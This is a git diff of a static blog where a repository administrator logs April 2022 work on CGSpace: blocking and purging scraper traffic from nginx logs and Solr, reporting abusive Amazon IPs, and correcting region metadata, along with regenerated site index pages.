<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
</span></span><span style="display:flex;"><span>2781
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
</span></span><span style="display:flex;"><span>338
</span></span></code></pre></div><ul>
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
<ul>
<li>This list is SURELY too broad because we will block legitimate users in China&hellip; but right now how can I discern?</li>
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
</ul>
</li>
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
</ul>
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
<ul>
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.log
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv4-networks-aggregated.txt
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv6-networks-aggregated.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
</span></span></code></pre></div><ul>
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
<ul>
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
<ul>
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
</ul>
</li>
</ul>
<h2 id="2022-04-24">2022-04-24</h2>
<ul>
<li>Start a harvest on AReS</li>
</ul>
<h2 id="2022-04-25">2022-04-25</h2>
<ul>
<li>Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
<ul>
<li>There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can&rsquo;t</li>
<li>I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete</li>
</ul>
</li>
<li>I notice we have over 1,000 items with region <code>Africa South of Sahara</code>
<ul>
<li>I am surprised to see these because we did a mass migration to <code>Sub-Saharan Africa</code> in 2020-10 when we aligned to UN M.49</li>
<li>Oh! It seems I used a capital O in <code>Of</code>!</li>
<li>This is curious, I see we missed <code>East Asia</code> and <code>Northern America</code>, because those are still in our list, but UN M.49 uses <code>Eastern Asia</code> and <code>Northern America</code>&hellip; I will have to raise that with Peter and Abenet later</li>
<li>For now I will just re-run my fixes:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/regions.csv
</span></span><span style="display:flex;"><span>cg.coverage.region,correct
</span></span><span style="display:flex;"><span>East Africa,Eastern Africa
</span></span><span style="display:flex;"><span>West Africa,Western Africa
</span></span><span style="display:flex;"><span>Southeast Asia,South-eastern Asia
</span></span><span style="display:flex;"><span>South Asia,Southern Asia
</span></span><span style="display:flex;"><span>Africa South of Sahara,Sub-Saharan Africa
</span></span><span style="display:flex;"><span>North Africa,Northern Africa
</span></span><span style="display:flex;"><span>West Asia,Western Asia
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.coverage.region -m <span style="color:#ae81ff">227</span> -t correct
</span></span></code></pre></div><ul>
<li>Then I started a new harvest on AReS</li>
</ul>
<h2 id="2022-04-27">2022-04-27</h2>
<ul>
<li>I woke up to many up down notices for CGSpace from UptimeRobot
<ul>
<li>The server has load 111.0&hellip; sigh.</li>
</ul>
</li>
<li>According to Grafana it seems to have started at 4:00 AM</li>
</ul>
<p><img src="/cgspace-notes/2022/04/cgspace-load.png" alt="Grafana load"></p>
<ul>
<li>There are a metric fuck ton of database locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 128 dspaceApi
</span></span><span style="display:flex;"><span> 16890 dspaceWeb
</span></span></code></pre></div><ul>
<li>As for the server logs, I don&rsquo;t see many IPs connecting today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2924
</span></span></code></pre></div><ul>
<li>But there appear to be some IPs making many requests:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> 345 207.46.13.53
</span></span><span style="display:flex;"><span> 646 66.249.66.222
</span></span><span style="display:flex;"><span> 678 54.90.79.112
</span></span><span style="display:flex;"><span> 1529 136.243.148.249
</span></span><span style="display:flex;"><span> 1797 54.175.8.110
</span></span><span style="display:flex;"><span> 2304 174.129.118.171
</span></span><span style="display:flex;"><span> 2523 66.249.66.221
</span></span><span style="display:flex;"><span> 2632 52.73.204.196
</span></span><span style="display:flex;"><span> 2667 54.174.240.122
</span></span><span style="display:flex;"><span> 5206 35.172.193.232
</span></span><span style="display:flex;"><span> 5646 35.153.131.101
</span></span><span style="display:flex;"><span> 6373 3.85.92.145
</span></span><span style="display:flex;"><span> 7383 34.227.10.4
</span></span><span style="display:flex;"><span> 8330 100.24.63.172
</span></span><span style="display:flex;"><span> 8342 34.236.36.176
</span></span><span style="display:flex;"><span> 8369 44.200.190.111
</span></span><span style="display:flex;"><span> 8371 3.238.116.153
</span></span><span style="display:flex;"><span> 8391 18.232.101.158
</span></span><span style="display:flex;"><span> 8631 3.239.81.247
</span></span><span style="display:flex;"><span> 8634 54.82.125.225
</span></span></code></pre></div><ul>
<li>54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:</li>
</ul>
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
</code></pre><ul>
<li>None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5760
</span></span><span style="display:flex;"><span>$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>6053
</span></span><span style="display:flex;"><span>$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5841
</span></span><span style="display:flex;"><span>$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5887
</span></span><span style="display:flex;"><span>$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5899
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>And we can see a massive spike in sessions in Munin:</li>
</ul>
<p><img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png" alt="Grafana load"></p>
<ul>
<li>I see the following IPs using that user agent today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep <span style="color:#e6db74">&#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36&#39;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 678 54.90.79.112
</span></span><span style="display:flex;"><span> 1797 54.175.8.110
</span></span><span style="display:flex;"><span> 2697 174.129.118.171
</span></span><span style="display:flex;"><span> 2765 52.73.204.196
</span></span><span style="display:flex;"><span> 3072 54.174.240.122
</span></span><span style="display:flex;"><span> 5206 35.172.193.232
</span></span><span style="display:flex;"><span> 5646 35.153.131.101
</span></span><span style="display:flex;"><span> 6783 3.85.92.145
</span></span><span style="display:flex;"><span> 7763 34.227.10.4
</span></span><span style="display:flex;"><span> 8738 100.24.63.172
</span></span><span style="display:flex;"><span> 8748 34.236.36.176
</span></span><span style="display:flex;"><span> 8787 3.238.116.153
</span></span><span style="display:flex;"><span> 8794 18.232.101.158
</span></span><span style="display:flex;"><span> 8806 44.200.190.111
</span></span><span style="display:flex;"><span> 9021 54.82.125.225
</span></span><span style="display:flex;"><span> 9027 3.239.81.247
</span></span></code></pre></div><ul>
<li>I added those IPs to the firewall and then purged their hits from Solr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 6024 hits from 100.24.63.172 in statistics
</span></span><span style="display:flex;"><span>Purging 1719 hits from 174.129.118.171 in statistics
</span></span><span style="display:flex;"><span>Purging 5972 hits from 18.232.101.158 in statistics
</span></span><span style="display:flex;"><span>Purging 6053 hits from 3.238.116.153 in statistics
</span></span><span style="display:flex;"><span>Purging 6228 hits from 3.239.81.247 in statistics
</span></span><span style="display:flex;"><span>Purging 5305 hits from 34.227.10.4 in statistics
</span></span><span style="display:flex;"><span>Purging 6002 hits from 34.236.36.176 in statistics
</span></span><span style="display:flex;"><span>Purging 3908 hits from 35.153.131.101 in statistics
</span></span><span style="display:flex;"><span>Purging 3692 hits from 35.172.193.232 in statistics
</span></span><span style="display:flex;"><span>Purging 4525 hits from 3.85.92.145 in statistics
</span></span><span style="display:flex;"><span>Purging 6048 hits from 44.200.190.111 in statistics
</span></span><span style="display:flex;"><span>Purging 1942 hits from 52.73.204.196 in statistics
</span></span><span style="display:flex;"><span>Purging 1944 hits from 54.174.240.122 in statistics
</span></span><span style="display:flex;"><span>Purging 1264 hits from 54.175.8.110 in statistics
</span></span><span style="display:flex;"><span>Purging 6117 hits from 54.82.125.225 in statistics
</span></span><span style="display:flex;"><span>Purging 486 hits from 54.90.79.112 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 67229
</span></span></code></pre></div><ul>
<li>Then I created a CSV with these IPs and reported them to AbuseIPDB.com:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips.csv
</span></span><span style="display:flex;"><span>IP,Categories,ReportDate,Comment
</span></span><span style="display:flex;"><span>100.24.63.172,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>174.129.118.171,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>18.232.101.158,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.238.116.153,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.239.81.247,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>34.227.10.4,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>34.236.36.176,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>35.153.131.101,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>35.172.193.232,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.85.92.145,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>44.200.190.111,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>52.73.204.196,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.174.240.122,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.175.8.110,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.82.125.225,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.90.79.112,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span></code></pre></div><!-- raw HTML omitted -->
</article>
</div> <!-- /.blog-main -->
<aside class="col-sm-3 ml-auto blog-sidebar">
<section class="sidebar-module">
<h4>Recent Posts</h4>
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>
<li><a href="/cgspace-notes/2022-01/">January, 2022</a></li>
<li><a href="/cgspace-notes/2021-12/">December, 2021</a></li>
</ol>
</section>
<section class="sidebar-module">
<h4>Links</h4>
<ol class="list-unstyled">
<li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
<li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
<li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
</ol>
</section>
</aside>
</div> <!-- /.row -->
</div> <!-- /.container -->
<footer class="blog-footer">
<p dir="auto">
Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
</p>
<p>
<a href="#">Back to top</a>
</p>
</footer>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.9 KiB

View File

@ -17,7 +17,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="404 Page not found"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -95,9 +95,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Categories"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -84,7 +84,7 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/categories/notes/">Notes</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time> by Alan Orth</p>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth</p>
</header>
<a href='https://alanorth.github.io/cgspace-notes/categories/notes/'>Read more →</a>
@ -108,9 +108,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,11 +6,11 @@
<description>Recent content in Categories on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>Notes</title>
<link>https://alanorth.github.io/cgspace-notes/categories/notes/</link>
<pubDate>Tue, 01 Mar 2022 16:46:54 +0300</pubDate>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/categories/notes/</guid>
<description></description>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -81,6 +81,24 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
@ -107,24 +125,6 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
@ -365,9 +365,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,7 +6,16 @@
<description>Recent content in Notes on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>March, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
@ -24,15 +33,6 @@
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
<pubDate>Tue, 01 Mar 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>February, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-02/</link>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -381,9 +381,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -404,9 +404,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -429,9 +429,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
